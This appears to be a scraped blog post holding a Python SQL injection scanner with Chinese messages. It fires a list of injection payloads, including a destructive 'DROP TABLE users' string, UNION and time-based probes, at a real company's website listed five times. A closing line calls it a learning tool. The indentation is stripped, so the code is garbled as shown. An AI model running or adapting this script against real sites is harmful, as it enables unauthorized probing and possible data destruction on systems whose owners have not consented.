import requests
import urllib.parse
from concurrent.futures import ThreadPoolExecutor
import logging
import time
import re
logging.basicConfig(level = logging.INFO)
def check_sql_injection(url, payload):
encoded_payload = urllib.parse.quote(payload)
test_url = f"{url}?param={encoded_payload}"
try:
response = requests.get(test_url, timeout = 10)
lower_text = response.text.lower()
if "error" in lower_text or "syntax error" in lower_text:
return f"可能存在SQL注入漏洞: {test_url}"
elif "mysql" in lower_text or "sql server" in lower_text or "database error" in lower_text:
return f"可能存在SQL注入漏洞: {test_url}"
elif re.search(r'error:\s\d{3,5}', lower_text):
return f"可能存在SQL注入漏洞: {test_url}"
elif re.search(r'(mysql|sql server|oracle|postgresql)\sfunction\s(error|exception)', lower_text):
return f"可能存在SQL注入漏洞: {test_url}"
else:
return None
except requests.exceptions.RequestException as e:
logging.warning(f"请求{test_url}时出现错误:{e}")
return None
def check_url_for_sql_injection(url):
common_payloads = ["' OR '1'='1'", "'; DROP TABLE users; --", "1' OR 'a'='a", "-1' UNION SELECT * FROM users--",
"' OR 1=1--", "1' AND SLEEP(5)--", "1';WAITFOR DELAY '0:0:5'--"]
results = []
with ThreadPoolExecutor(max_workers = 10) as executor:
futures = [executor.submit(check_sql_injection, url, payload) for payload in common_payloads]
for future in futures:
result = future.result()
if result:
results.append(result)
if results:
for result in results:
print(result)
else:
print(f"未检测到SQL注入漏洞: {url}")
def scan_multiple_urls(urls):
for url in urls:
print(f"正在扫描{url}")
start_time = time.time()
check_url_for_sql_injection(url)
end_time = time.time()
print(f"扫描{url}耗时:{end_time - start_time:.2f}秒")
target_urls = ["https://360.com", "https://360.com", "https://360.com", "https://360.com", "https://360.com"]
scan_multiple_urls(target_urls)
本程序一次性可以扫描五个网站但是请注意它只是一个提供学习的工具并不能代替专业的扫描工具
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
